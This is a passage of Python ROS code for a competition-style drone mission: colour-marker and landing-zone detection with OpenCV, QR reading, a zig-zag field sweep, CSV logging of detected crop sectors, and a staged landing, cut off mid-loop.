self.UPDATE_RATE = 5
self.video_writer = cv2.VideoWriter(os.environ['HOME']+"/L22_AERO_LOG/LOG_IMAGE_RAW_real_drone.avi", self.fourcc, self.UPDATE_RATE, (320, 240))
self.image_raw_frame = np.zeros((240, 320, 3), dtype="uint8")
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/main_camera/image_raw_throttled", Image, self.img_clb)
self.stopped = False
def img_clb(self, msg):
self.image_raw_frame = self.bridge.imgmsg_to_cv2(msg, "bgr8")
def start(self):
Thread(target=self.videowriter, args=()).start()
return self
def videowriter(self):
try:
r = rospy.Rate(self.UPDATE_RATE)
while not self.stopped:
self.video_writer.write(self.image_raw_frame)
r.sleep()
except KeyboardInterrupt:
self.video_writer.release()
self.stopped = True
def stop(self):
self.stopped = True
self.video_writer.release()
result_GLOBAL = [] # ColorRectMarker_p
circles_GLOBAL = [] # ColorRectMarker_p
rospy.init_node('l22_aero_color_node', anonymous=True)
bridge = CvBridge()
# markers_arr_pub = rospy.Publisher("/l22_aero_color/markers", ColorRectMarkerArray)
# circles_arr_pub = rospy.Publisher("/l22_aero_color/circles", ColorRectMarkerArray)
image_pub = rospy.Publisher("/l22_aero_color/debug_img", Image)
# Параметры цвета маркеров
# colors_p_hsv = {
# 'blue': (np.array([103, 47, 65]), np.array([150, 187, 172])),
# 'green': (np.array([28, 44, 20]), np.array([100, 255, 255])),
# 'yellow': (np.array([14, 100, 104]), np.array([29, 255, 255])),
# 'red': (np.array([151, 134, 99]), np.array([255, 243, 252])),
# 'brown': (np.array([6, 86, 99]), np.array([255, 243, 252]))
# }
'''
colors_p_hsv = {
'blue': (np.array([72, 121, 67]), np.array([180, 255, 255])),
'green': (np.array([43, 121, 67]), np.array([116, 255, 255])),
'yellow': (np.array([15, 121, 67]), np.array([37, 255, 255])),
'red': (np.array([0, 121, 67]), np.array([5, 255, 255])),
'brown': (np.array([5, 121, 67]), np.array([24, 255, 255]))
}
'''
colors_p_hsv = {
'green': (np.array([71, 86, 22]), np.array([88, 255, 255])),
'yellow': (np.array([13, 63, 74]), np.array([65, 255, 255])),
'blue': (np.array([94, 88, 63]), np.array([134, 255, 255])),
'red': (np.array([133, 94, 62]), np.array([241, 255, 255])),
'brown': (np.array([0, 111, 98]), np.array([12, 255, 255])),
}
colors_p_rgb = {
"yellow": [0, 200, 200],
"red": [0, 0, 255],
"blue": [255, 0, 0],
"green": [0, 255, 0],
"brown": [42, 42, 165]
}
# Формат вывода
type_mapping_1 = {
'blue': 'N2_water',
'green': 'N2_pastures',
'yellow': 'N2_seed',
'red': 'N2_potato',
'brown': 'N2_soil'
}
# # Размеры цветных маркеров
MARKER_SIDE1_SIZE = 0.35 # in m
MARKER_SIDE2_SIZE = 0.35 # in m
CIRCLE_R = 0.2
# Размеры цветных маркеров
# MARKER_SIDE1_SIZE = 0.3 # in m
# MARKER_SIDE2_SIZE = 0.3 # in m
# CIRCLE_R = 0.15
OBJ_S_THRESH = 350
OFFSET = [61, 35] # pixels
objectPoint = np.array([(-MARKER_SIDE1_SIZE / 2, -MARKER_SIDE2_SIZE / 2, 0), (MARKER_SIDE1_SIZE / 2, -MARKER_SIDE2_SIZE / 2, 0),
(MARKER_SIDE1_SIZE / 2, MARKER_SIDE2_SIZE / 2, 0), (-MARKER_SIDE1_SIZE / 2, MARKER_SIDE2_SIZE / 2, 0)])
objectPoint_circles = np.array([(-CIRCLE_R, -CIRCLE_R, 0), (CIRCLE_R, -CIRCLE_R, 0),
(CIRCLE_R, CIRCLE_R, 0), (-CIRCLE_R, CIRCLE_R, 0)])
# print("objectPoint shape:", objectPoint.shape)
class ColorRect:
def __init__(self, cx_img=0, cy_img=0, color="none", points_img=[]):
self.cx_img = cx_img
self.cy_img = cy_img
self.color = color
self.points_img = points_img
class ColorRectMarker_p:
def __init__(self, cx_img=0, cy_img=0, color="none", points_img=[], cx_cam=0, cy_cam=0, cz_cam=0):
self.cx_img = cx_img
self.cy_img = cy_img
self.color = color
self.points_img = points_img
self.cx_cam = cx_cam
self.cy_cam = cy_cam
self.cz_cam = cz_cam
def fromColorRect(self, cr):
self.cx_img = cr.cx_img
self.cy_img = cr.cy_img
self.color = cr.color
self.points_img = cr.points_img
return self
def toMsg(self):
return ColorRectMarker(color=self.color, cx_img=self.cx_img, cy_img=self.cy_img, cx_cam=self.cx_cam, cy_cam=self.cy_cam, cz_cam=self.cz_cam, size1=MARKER_SIDE1_SIZE, size2=MARKER_SIDE2_SIZE)
def __str__(self):
return "color: {}\n coords: {} {} {}".format(self.color, str(self.cx_cam), str(self.cy_cam), str(self.cz_cam))
# Параметры камеры
cameraMatrix = np.zeros((3, 3), dtype="float64")
distCoeffs = np.zeros((8, 1), dtype="float64")
has_cam_info = False
def camera_info_clb(msg):
    """Cache the camera intrinsics from the first CameraInfo message.

    Converts the ROS camera parameters (msg.D, msg.K) into the OpenCV
    distortion-coefficient vector and 3x3 camera matrix. Messages after
    the first one are ignored.
    """
    global has_cam_info, cameraMatrix, distCoeffs
    if has_cam_info:
        return
    has_cam_info = True
    distCoeffs = np.array(msg.D, dtype="float64")
    cameraMatrix = np.array(msg.K, dtype="float64").reshape((3, 3))
def get_color_objs(image, hsv, color_params):
    """Find the contours of one colour in an HSV image.

    color_params holds one (lo, hi) HSV bound pair, or two pairs
    (lo1, hi1, lo2, hi2) for hues that wrap around the hue circle.
    Returns (contours whose area exceeds OBJ_S_THRESH, masked debug image).
    """
    mask = cv2.inRange(hsv, color_params[0], color_params[1])
    if len(color_params) == 4:
        second_band = cv2.inRange(hsv, color_params[2], color_params[3])
        mask = cv2.bitwise_or(mask, second_band)
    # thresh = cv2.threshold(mask, 80, 255, cv2.THRESH_BINARY)[1]
    # [-2] keeps compatibility across OpenCV versions that return 2 or 3 values.
    contours = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
                                cv2.CHAIN_APPROX_SIMPLE)[-2]
    big_enough = [c for c in contours if cv2.contourArea(c) > OBJ_S_THRESH]
    debug_out = cv2.bitwise_and(image, image, mask=mask)
    return big_enough, debug_out
def img_colision_check(pnts, offset, image_shape=(240, 320, 3)):
    """Return True when every point keeps more than `offset` pixels of
    margin from all four image borders, i.e. the contour lies fully inside
    the safe central area of the frame."""
    xs = pnts[:, 0]
    ys = pnts[:, 1]
    height, width = image_shape[0], image_shape[1]
    left_ok = xs.min() > offset[0]
    right_ok = width - xs.max() > offset[0]
    top_ok = ys.min() > offset[1]
    bottom_ok = height - ys.max() > offset[1]
    return left_ok and right_ok and top_ok and bottom_ok
# def get_color_rects(cnts, color_name, image_shape=(240, 320, 3)):
# """
# Фильтрация контуров
# """
# result = []
# for cnt in cnts:
# approx = cv2.approxPolyDP(cnt, 0.02 * cv2.arcLength(cnt, True), True)
# rect = cv2.minAreaRect(cnt)
# # print(rect)
# if len(approx) == 4 and abs(1 - rect[1][0] / (rect[1][1] + 1e-7)) < 0.2:
# points_img = np.array([np.array(p[0]) for p in approx]) # ?
# if img_colision_check(points_img, OFFSET,image_shape=image_shape):
# M = cv2.moments(cnt)
# cX = int((M["m10"] / (M["m00"] + 1e-7)))
# cY = int((M["m01"] / (M["m00"] + 1e-7)))
# result.append(ColorRect(color=color_name, cx_img=cX, cy_img=cY, points_img=points_img))
# return result
def get_color_rects_circles(cnts, color_name, image_shape=(240, 320, 3)):
    global OFFSET
    """
    Фильтрация контуров
    """
    # Contour filtering: classify each contour either as a square marker
    # (4-vertex polygon that fills most of its bounding box) or as a circular
    # landing zone (>4 vertices, near-square bounding box, low fill ratio).
    result = []
    circles = []
    for cnt in cnts:
        # Polygonal approximation with tolerance 4% of the contour perimeter.
        approx = cv2.approxPolyDP(cnt, 0.04 * cv2.arcLength(cnt, True), True)
        rect = cv2.minAreaRect(cnt)
        box = cv2.boxPoints(rect)
        box = np.int0(box)
        # +1e-7 guards against division by zero on degenerate contours.
        box_area = cv2.contourArea(box) + 1e-7
        c_area = cv2.contourArea(cnt) + 1e-7
        # print(rect)
        # Square marker: 4 corners, near-square aspect ratio, contour covers
        # > 85% of its minimum-area bounding box.
        if len(approx) == 4 and abs(1 - rect[1][0] / (rect[1][1] + 1e-7)) < 0.15 and abs(c_area / box_area) > 0.85:
            points_img = np.array([np.array(p[0]) for p in approx])  # ?
            # points_img = box
            # Only accept detections away from the frame border.
            if img_colision_check(points_img, OFFSET, image_shape=image_shape):
                M = cv2.moments(cnt)
                cX = int((M["m10"] / (M["m00"] + 1e-7)))
                cY = int((M["m01"] / (M["m00"] + 1e-7)))
                result.append(ColorRect(color=color_name, cx_img=cX, cy_img=cY, points_img=points_img))
        # Landing-zone circle: many vertices, near-square bounding box, but the
        # contour fills < 80% of the box (an ideal circle fills ~78.5%).
        elif len(approx) > 4 and abs(1 - rect[1][0] / (rect[1][1] + 1e-7)) < 0.2 and color_name in ["green", "yellow", "blue"] and abs(c_area / box_area) < 0.8:
            # elp = cv2.fitEllipse(cnt)
            points_img = box
            if img_colision_check(points_img, OFFSET, image_shape=image_shape):
                M = cv2.moments(cnt)
                cX = int((M["m10"] / (M["m00"] + 1e-7)))
                cY = int((M["m01"] / (M["m00"] + 1e-7)))
                circles.append(ColorRect(color=color_name, cx_img=cX, cy_img=cY, points_img=points_img))
    return result, circles
def draw_cnts_colors(image, cnts, color_name, t=1):
    """Draw every contour in `cnts` onto `image` using the display colour
    assigned to `color_name`; returns the annotated image."""
    outline = colors_p_rgb[color_name]
    for contour in cnts:
        cv2.drawContours(image, [contour], -1, outline, 2)
    return image
def draw_color_rect(image, cr, t=1):
    """Visualise a recognised colour marker.

    Corner points are drawn in increasing shades of grey, the centre dot in
    the marker's colour. With truthy `t` the mapped field-type label is
    written on a white background, otherwise the raw colour name is written.
    """
    for idx, corner in enumerate(cr.points_img):
        shade = (idx + 1) * (255 // 4)
        cv2.circle(image, tuple(corner), 5, (shade, shade, shade), -1)
    marker_color = colors_p_rgb[cr.color]
    center = (cr.cx_img, cr.cy_img)
    cv2.circle(image, center, 5, marker_color, -1)
    if t:
        cv2.rectangle(image, (cr.cx_img, cr.cy_img - 15), (cr.cx_img + 75, cr.cy_img + 5), (255, 255, 255), -1)
        cv2.putText(image, type_mapping_1[cr.color], center,
                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, marker_color, 1, cv2.LINE_AA)
    else:
        cv2.putText(image, cr.color, center,
                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, marker_color, 2, cv2.LINE_AA)
    return image
def draw_color_circle(image, cr, t=1):
    """Visualise a recognised landing zone: corner points in grey shades,
    the centre dot in the zone's colour and a "LANDING_ZONE" caption
    (drawn on a white background when `t` is truthy)."""
    for idx, corner in enumerate(cr.points_img):
        shade = (idx + 1) * (255 // 4)
        cv2.circle(image, tuple(corner), 5, (shade, shade, shade), -1)
    zone_color = colors_p_rgb[cr.color]
    center = (cr.cx_img, cr.cy_img)
    cv2.circle(image, center, 5, zone_color, -1)
    if t:
        cv2.rectangle(image, (cr.cx_img, cr.cy_img - 15), (cr.cx_img + 75, cr.cy_img + 5), (255, 255, 255), -1)
        cv2.putText(image, "LANDING_ZONE", center,
                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, zone_color, 1, cv2.LINE_AA)
    else:
        cv2.putText(image, "LANDING_ZONE", center,
                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, zone_color, 2, cv2.LINE_AA)
    return image
def get_rect_pose(rect, op, cM, dC):
    """Estimate the marker pose relative to the camera with solvePnP.

    op: 3-D object points of the marker model (metres); cM/dC: camera
    matrix and distortion coefficients. Returns a ColorRectMarker_p whose
    camera-frame centre is taken from the translation vector.
    """
    object_pts = np.array(op, dtype="float64")
    image_pts = np.array(rect.points_img, dtype="float64")
    retval, rvec, tvec = cv2.solvePnP(object_pts, image_pts, cM, dC)
    pose = ColorRectMarker_p(cx_cam=tvec[0][0], cy_cam=tvec[1][0], cz_cam=tvec[2][0])
    return pose.fromColorRect(rect)
def img_clb(msg):
    """Main image callback: detect colour markers and landing zones in the
    frame, draw a debug overlay, refresh the *_GLOBAL pose lists and publish
    the annotated image."""
    global has_cam_info, cameraMatrix, distCoeffs, result_GLOBAL, circles_GLOBAL
    image = bridge.imgmsg_to_cv2(msg, "bgr8")
    # print(image.shape)
    # image[:, :, 2] = np.clip(image[:, :, 2]*0.7, 0, 255)
    # image[:, :, 1] = np.clip(image[:, :, 1]*1.2, 0, 255)
    # image[:, :, 0] = np.clip(image[:, :, 0]*1.5, 0, 255)
    out = image.copy()
    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
    result_in_img_frame = []  # ColorRect
    circles_in_img_frame = []
    # Detect squares/circles of every colour of interest and draw them.
    for c_name in ["blue", "yellow", "green", "red", "brown"]:
        cnts, d_img = get_color_objs(image, hsv, colors_p_hsv[c_name])
        draw_cnts_colors(out, cnts, c_name)
        # result_in_img_frame += get_color_rects(cnts, c_name)
        k = get_color_rects_circles(cnts, c_name)
        result_in_img_frame += k[0]
        circles_in_img_frame += k[1]
    for i in result_in_img_frame:
        draw_color_rect(out, i)
    for i in circles_in_img_frame:
        draw_color_circle(out, i)
    # cv2.imshow("out", out)
    result_GLOBAL = []
    circles_GLOBAL = []
    # Pose estimation requires the camera intrinsics, so skip until the
    # first CameraInfo message has been received.
    if has_cam_info:
        for r in result_in_img_frame:
            result_GLOBAL.append(get_rect_pose(r, objectPoint, cameraMatrix, distCoeffs))
        for c in circles_in_img_frame:
            circles_GLOBAL.append(get_rect_pose(c, objectPoint_circles, cameraMatrix, distCoeffs))
    # if len(result) > 0:
    #     print("RES: \n " + "\n ".join(map(str, result)))
    # if len(circles) > 0:
    #     print("circles: \n " + "\n ".join(map(str, circles)))
    # cv2.waitKey(1)
    # Publishing of the recognition results (currently disabled):
    # markers_arr_pub.publish(ColorRectMarkerArray(header=Header(stamp=rospy.Time.now(), frame_id="color_marker_cam"), markers=[r.toMsg() for r in result]))
    # circles_arr_pub.publish(ColorRectMarkerArray(header=Header(stamp=rospy.Time.now(), frame_id="color_marker_cam"), markers=[r.toMsg() for r in circles]))
    image_pub.publish(bridge.cv2_to_imgmsg(out, "bgr8"))
# Subscribe to the (throttled) camera stream and the camera intrinsics.
image_sub = rospy.Subscriber(
    "/main_camera/image_raw_throttled", Image, img_clb)
camera_info_sub = rospy.Subscriber(
    "/main_camera/camera_info", CameraInfo, camera_info_clb)
# rospy.spin()
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
Z_TOL = 0.5
TOLERANCE_COORDS = 0.4  # in meters; detections closer than this are merged
COORDS_UPDATE_RATE = 1
# ARUCO_TELEM_RATE = 5
# Accumulated map-frame coordinates per object type.
coordinates = {
    'water': [],
    'pastures': [],
    'seed': [],
    'potato': [],
    'soil': [],
    'water_land': [],
    'seed_land': [],
    'pastures_land': []
}
# Detected colour -> crop/object type key in `coordinates`.
type_mapping = {
    'blue': 'water',
    'green': 'pastures',
    'yellow': 'seed',
    'red': 'potato',
    'brown': 'soil'
}
# Colour or crop type -> landing-zone key in `coordinates`.
circle_type_mapping = {
    'seed': 'seed_land',
    'pastures': 'pastures_land',
    'water': 'water_land',
    'blue': 'water_land',
    'green': 'pastures_land',
    'yellow': 'seed_land'
}
# ROS service proxies for flight control and arming.
get_telemetry = rospy.ServiceProxy('get_telemetry', srv.GetTelemetry)
navigate = rospy.ServiceProxy('navigate', srv.Navigate)
navigate_global = rospy.ServiceProxy('navigate_global', srv.NavigateGlobal)
set_position = rospy.ServiceProxy('set_position', srv.SetPosition)
set_velocity = rospy.ServiceProxy('set_velocity', srv.SetVelocity)
set_attitude = rospy.ServiceProxy('set_attitude', srv.SetAttitude)
set_rates = rospy.ServiceProxy('set_rates', srv.SetRates)
land_serv = rospy.ServiceProxy('land', Trigger)
arming = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
nav_broadcaster = tf.TransformBroadcaster()
# tf_buffer = tf2_ros.Buffer()
# tf_listener = tf2_ros.TransformListener(tf_buffer)
listener = tf.TransformListener()
#####
Z = 0
def navigate_aruco(x=0, y=0, z=0, yaw=float('nan'), speed=0.4, floor=False):
    '''
    Fly towards a point in the aruco_map frame without waiting for arrival.
    NOTE(review): the `floor` argument is accepted but never forwarded to
    navigate() — confirm whether floor-relative altitude was intended.
    '''
    return navigate(x=x, y=y, z=z, yaw=yaw, speed=speed, frame_id='aruco_map')
def get_telemetry_aruco():
    """Return the current telemetry expressed in the aruco_map frame."""
    # Z = telem.z
    return get_telemetry(frame_id="aruco_map")
def takeoff(z):
    """Arm and take off to altitude `z` in the body frame, then hold the
    pre-takeoff horizontal position in the aruco_map frame."""
    start = get_telemetry_aruco()
    navigate(z=z, speed=0.3, frame_id="body", auto_arm=True)
    rospy.sleep(2)
    navigate_aruco(x=start.x, y=start.y, z=z, speed=0.4, floor=True)
def navigate_wait(x, y, z, yaw=float('nan'), speed=0.2, tolerance=0.13):
    """Fly to (x, y, z) in the aruco_map frame and block until the drone is
    within `tolerance` metres of the target (polls every 0.2 s)."""
    navigate_aruco(x=x, y=y, z=z, yaw=yaw, speed=speed)
    while not rospy.is_shutdown():
        # Telemetry in navigate_target frame gives the remaining offset.
        remaining = get_telemetry(frame_id="navigate_target")
        dist_left = math.sqrt(remaining.x ** 2 + remaining.y ** 2 + remaining.z ** 2)
        if dist_left < tolerance:
            break
        rospy.sleep(0.2)
def land():
    '''
    Land the drone: call the landing service, wait briefly for touchdown,
    then force-disarm.
    '''
    land_serv()
    rospy.sleep(0.813)  # give the landing a moment before disarming
    arming(False)
class ColorRectMarkerMap:
    """A colour marker located in the map (aruco_map) frame.

    Stores the map-frame centre (cx_map, cy_map, cz_map) alongside the
    original image-plane centre and colour name.
    """

    def __init__(self, cx_map=0, cy_map=0, cz_map=0, cx_img=0, cy_img=0, color="none"):
        self.cx_map = cx_map
        self.cy_map = cy_map
        self.cz_map = cz_map
        self.cx_img = cx_img
        self.cy_img = cy_img
        self.color = color

    def __str__(self):
        coords = (str(self.cx_map), str(self.cy_map), str(self.cz_map))
        return "color: {}\n coords map: {} {} {}".format(self.color, *coords)
class Recognition:
    """Aggregates marker/landing-zone detections into averaged map-frame
    coordinates and decodes QR codes from the camera stream."""

    def __init__(self):
        '''
        Initialise state, subscribe to main_camera/image_raw_throttled
        (handled by image_callback) and create the /qr_debug image publisher.
        '''
        self.barcodeData = None
        self.bridge = CvBridge()
        self.cv_image = np.zeros((240, 320, 3), dtype="uint8")
        self.image_sub = rospy.Subscriber('/main_camera/image_raw_throttled', Image, self.image_callback)
        self.qr_pub = rospy.Publisher('/qr_debug', Image, queue_size=1)
        # self.coords_sub = sub = rospy.Subscriber("/l22_aero_color/markers", ColorRectMarkerArray, self.markers_arr_clb)
        # self.circles_sub = rospy.Subscriber("/l22_aero_color/circles", ColorRectMarkerArray, self.circles_arr_clb)
        self.result = []
        self.circles = []
        # self.coords_thread = threading.Thread(target=self.coords_thread_func)
        # self.coords_thread.daemon = True
        # self.coords_thread.start()

    def transform_marker(self, marker, frame_to="aruco_map"):# -> ColorRectMarkerMap:
        # Transform a camera-frame marker pose into `frame_to`; on a TF
        # lookup/connectivity failure the coordinates stay (0, 0, 0).
        cx_map = 0
        cy_map = 0
        cz_map = 0
        try:
            cx_map, cy_map, cz_map, _ = transform_xyz_yaw(
                marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", frame_to, listener)
        except (tf.LookupException, tf.ConnectivityException):
            print("ARUCOARUCOARUCO")
        return ColorRectMarkerMap(color=marker.color, cx_map=cx_map, cy_map=cy_map, cz_map=cz_map)

    def markers_arr_clb(self, msg):
        '''
        Parse colour-marker detections: transform each into the map frame
        and append to self.result.
        '''
        # self.result = []
        for marker in msg:
            self.result.append(self.transform_marker(marker, frame_to="aruco_map"))

    def circles_arr_clb(self, msg):
        '''
        Parse landing-zone detections: transform each into the map frame
        and append to self.circles.
        '''
        # self.circles = []
        for marker in msg:
            self.circles.append(self.transform_marker(marker, frame_to="aruco_map"))

    def image_callback(self, data):
        '''
        Store the latest camera frame (resized to 320x240) for QR decoding.
        '''
        self.cv_image = cv2.resize(self.bridge.imgmsg_to_cv2(data, 'bgr8'), (320, 240))

    def most_frequent(self, arr):
        '''
        Return the value that occurs most often in the array.
        '''
        return max(set(arr), key = arr.count)

    def distance(self, coord1, coord2):
        '''
        Euclidean distance between two 2-D coordinates.
        '''
        return ((coord1[0] - coord2[0])**2 + (coord1[1] - coord2[1])**2)**0.5

    def average(self, coord1, coord2):
        '''
        Midpoint of two 2-D coordinates.
        '''
        return ((coord1[0] + coord2[0])/2, (coord1[1] + coord2[1])/2)

    def coordsFunc(self):
        global result_GLOBAL, circles_GLOBAL, coordinates
        # global Z
        '''
        Функция для усреднения координат цветных маркеров
        '''
        # Merge the latest detections into the global `coordinates` dict:
        # a detection within TOLERANCE_COORDS of an existing entry is
        # averaged into it, otherwise a new entry is created.
        self.markers_arr_clb(result_GLOBAL)
        self.circles_arr_clb(circles_GLOBAL)
        print("GLOBAL",result_GLOBAL, circles_GLOBAL)
        # global coordinates
        # Z = get_telemetry_aruco().z
        for i in range(len(self.result)):
            # Map colour names to coordinate keys when necessary.
            if self.result[i].color not in coordinates:
                color = type_mapping[self.result[i].color]
            else:
                color = self.result[i].color
            # if (self.result[i].cz_map - Z) < Z_TOL:
            tempCoords = (self.result[i].cx_img, self.result[i].cy_img) if False else (self.result[i].cx_map, self.result[i].cy_map)
            # Discard detections far outside the field.
            if tempCoords[0] < -1.5 or tempCoords[1] < -1.5: continue
            if len(coordinates[color]) == 0:
                coordinates[color].append(tempCoords)
            else:
                for j in range(len(coordinates[color])):
                    if self.distance(coordinates[color][j], tempCoords) <= TOLERANCE_COORDS:
                        coordinates[color][j] = self.average(tempCoords, coordinates[color][j])
                        break
                else:
                    coordinates[color].append(tempCoords)
        self.result = []
        # Landing zones additionally carry a hit counter as third element.
        for i in range(len(self.circles)):
            if self.circles[i].color not in coordinates:
                color = circle_type_mapping[self.circles[i].color]
            else:
                color = self.circles[i].color
            tempCoords = [self.circles[i].cx_map, self.circles[i].cy_map]#####################################
            if tempCoords[0] < -1 or tempCoords[1] < -1: continue #DELETE IF NEEDED!
            if len(coordinates[color]) == 0:
                coordinates[color].append(list(tempCoords) + [1])##################################################
            else:
                for j in range(len(coordinates[color])):
                    if self.distance(coordinates[color][j], tempCoords) <= TOLERANCE_COORDS:
                        coordinates[color][j] = list(self.average(tempCoords, coordinates[color][j])) + [coordinates[color][j][2] + 1] ################################
                        break
                else:
                    coordinates[color].append(list(tempCoords) + [1]) ###############################################################
        self.circles = []

    def coords_thread_func(self):
        # Periodically merge fresh detections at COORDS_UPDATE_RATE Hz.
        r = rospy.Rate(COORDS_UPDATE_RATE)
        while True:
            self.coordsFunc()
            r.sleep()

    def waitDataQR(self):
        '''
        Decode QR codes from the current frame, mark the decoded code on the
        debug image and return the last decoded payload (or the previously
        decoded one if nothing was found in this frame).
        '''
        gray = cv2.cvtColor(self.cv_image, cv2.COLOR_BGR2GRAY)
        barcodes = pyzbar.decode(gray)
        for barcode in barcodes:
            (x, y, w, h) = barcode.rect
            self.barcodeData = barcode.data.decode("utf-8")
            xc = x + w/2
            yc = y + h/2
            self.cv_image = cv2.circle(self.cv_image, (int(xc), int(yc)), 15, (0, 0, 0), 30)
        self.qr_pub.publish(self.bridge.cv2_to_imgmsg(self.cv_image, 'bgr8'))
        return self.barcodeData
# Create the recogniser object and start video recording.
rc = Recognition()
vr = VideoRecorder().start()
z = 1.5  # cruise altitude in metres
FIELD_LENGTH_X = 2.83 #in meters
FIELD_LENGTH_Y = 2.65 #in meters
deltaX = 0.65 #in meters
deltaY = 0.25 #in meters
betweenX = 3  # intermediate points inserted between zig-zag columns
LANDING_B = 5
i, count = 0.1, 0  # current column coordinate and column counter
points = []  # waypoints of the field sweep
def getAdditionalPoints(coord1, coord2, parts, xyz=0):
    '''
    Generate `parts` + 1 evenly spaced points from coord1 to coord2
    inclusive. With truthy `xyz` the coordinates are 3-D, otherwise 2-D.
    Returns an iterator of coordinate tuples.
    '''
    dims = 3 if xyz else 2
    axes = [np.linspace(coord1[k], coord2[k], parts + 1) for k in range(dims)]
    return zip(*axes)
# Build the waypoint list for sweeping the field in a zig-zag pattern:
# columns are deltaX apart, rows deltaY apart, with alternating direction.
while i <= FIELD_LENGTH_X:
    j = 0.1
    while j <= FIELD_LENGTH_Y:
        if count % 2 == 0:
            points.append((i, j))
        else:
            # Odd columns are traversed in the opposite direction.
            points.append((i, FIELD_LENGTH_Y-j))
        j += deltaY
    # Clamp j back onto the field edge if the last step overshot it.
    d = j - FIELD_LENGTH_Y
    if d > 0: j -= d
    # Insert intermediate points along the transition to the next column.
    # NOTE(review): `i != len(points) - 1` compares the float column
    # coordinate with a list length — confirm the intended condition.
    if count % 2 == 0 and i != len(points) - 1:
        points += list(getAdditionalPoints((i, j), (i + deltaX, j), betweenX))
    elif count % 2 != 0 and i != len(points) - 1:
        points += list(getAdditionalPoints((i, FIELD_LENGTH_Y - j), (i + deltaX, FIELD_LENGTH_Y-j), betweenX))
    i += deltaX
    count += 1
# Drop the trailing transition points if the last column left the field.
if points[-1][0] > FIELD_LENGTH_X:
    points = points[:-3]
# Take off.
takeoff(z)
navigate_wait(0.15, 0.15, 1.2)
# QR-code recognition.
qrs = []
qr = 'seed'  # fallback crop type if no QR code is decoded
zLower = 1.05
# Fly around the QR code to improve the recognition reliability.
for (x_new, y_new) in [(0.12, 0.15), (0.18, 0.05), (0.20, 0.05), (0.23, 0.2), (0.2, 0.25), (0.15, 0.15)]:
    navigate_wait(x_new, y_new, zLower)
    qrs.append(rc.waitDataQR())
    rospy.sleep(0.55)
# Pick the payload seen most often across the attempts.
if len(qrs) > 0:
    qr = rc.most_frequent(qrs)
if qr == None:
    qr = 'seed'
print(".....")
print(qr)
navigate_wait(0.15, 0.1, z)
# Sweep the field along the zig-zag waypoints, merging detections at each stop.
for point in points:
    '''
    if points.index(point) == int(len(points) // 4):
        break
    '''
    navigate_wait(x=point[0], y=point[1], z=z, speed=0.4, yaw=3.14/2.0)
    rospy.sleep(0.3)
    rc.coordsFunc()
    rospy.sleep(0.3)
print("739")
# for (x_new, y_new) in [(0.75*FIELD_LENGTH_X, 0.75*FIELD_LENGTH_Y), (0.75*FIELD_LENGTH_X, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, 0.75*FIELD_LENGTH_Y)]:
#     navigate_wait(x_new, y_new, 2.1)
#     rospy.sleep(1)
print(coordinates[circle_type_mapping[qr]])
# Choose the landing coordinates: the zone of the QR-selected type that was
# detected most often, or (1, 1) as a fallback when none was seen.
if len(coordinates[circle_type_mapping[qr]]) == 0:
    landCoordinate = (1, 1)
    print("1, 1")
else:
    landCoordinate = max(coordinates[circle_type_mapping[qr]], key=lambda x: x[2])[:2] ###############################################################
print("landCoordinate", landCoordinate)
print("746")
# Approach the landing point through intermediate waypoints.
telem = get_telemetry_aruco()
for (x_new, y_new) in list(getAdditionalPoints((telem.x, telem.y), landCoordinate, 3)):
    navigate_wait(x_new, y_new, z)
navigate_wait(landCoordinate[0], landCoordinate[1], z)
print("749")
print(coordinates)
# Создание csv файла с координатами
if not os.path.exists(os.environ['HOME']+"/L22_AERO_LOG"):
os.mkdir(os.environ['HOME']+"/L22_AERO_LOG")
import csv
# from time import time
with open(os.environ['HOME']+"/L22_AERO_LOG/" + 'L22_AERO_result.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(["Sector", "Type", "x (cm)", "y (cm)"])
arr = []
for key in coordinates:
if key in ['water_land', 'seed_land', 'pastures_land']: continue
for j in range(len(coordinates[key])):
x = coordinates[key][j][0]
y = coordinates[key][j][1]
if x < FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
arr.append(['C', key, x*100, y*100])
elif x < FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
arr.append(['A', key, x*100, y*100])
elif x >= FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
arr.append(['D', key, x*100, y*100])
elif x >= FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
arr.append(['B', key, x*100, y*100])
arr.sort(key = lambda x: x[0])
writer.writerows(arr)
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['TIME:', str(time.time()), 'TIME:', str(time.time())])
print('CSV SAVED')
# Staged descent towards the chosen landing zone: re-detect the zone at each
# altitude step and correct the target coordinates on the fly.
telem = get_telemetry_aruco()
last = None  # most recent list of matching zone detections near the target
Z_LAND = 0.86
landingPath = list(getAdditionalPoints((landCoordinate[0], landCoordinate[1], z), (landCoordinate[0], landCoordinate[1], Z_LAND), 4, xyz = 1))
print(landingPath)
j = 0
print("756")
markerType = circle_type_mapping[qr]
while j < len(landingPath):
    print(i, j)
    rc.markers_arr_clb(result_GLOBAL)
    rc.circles_arr_clb(circles_GLOBAL)
    print(rc.circles)
    circles_copy = list(rc.circles)
    if len(circles_copy) > 0:
        for i in range(len(circles_copy)):
            # Accept only zones of the right type close to the target point.
            if rc.distance((circles_copy[i].cx_map, circles_copy[i].cy_map), landCoordinate) <= 0.6 and circle_type_mapping[circles_copy[i].color] == markerType:
                navigate_wait(circles_copy[i].cx_map, circles_copy[i].cy_map, landingPath[j][2])
                last = list(circles_copy)
                break
        else:
            # No matching zone found this pass.
            circles_copy = []
    j += 1
    if len(circles_copy) == 0:
        if last == None:
            navigate_wait(landCoordinate[0], landCoordinate[1], 1.5)
        else:
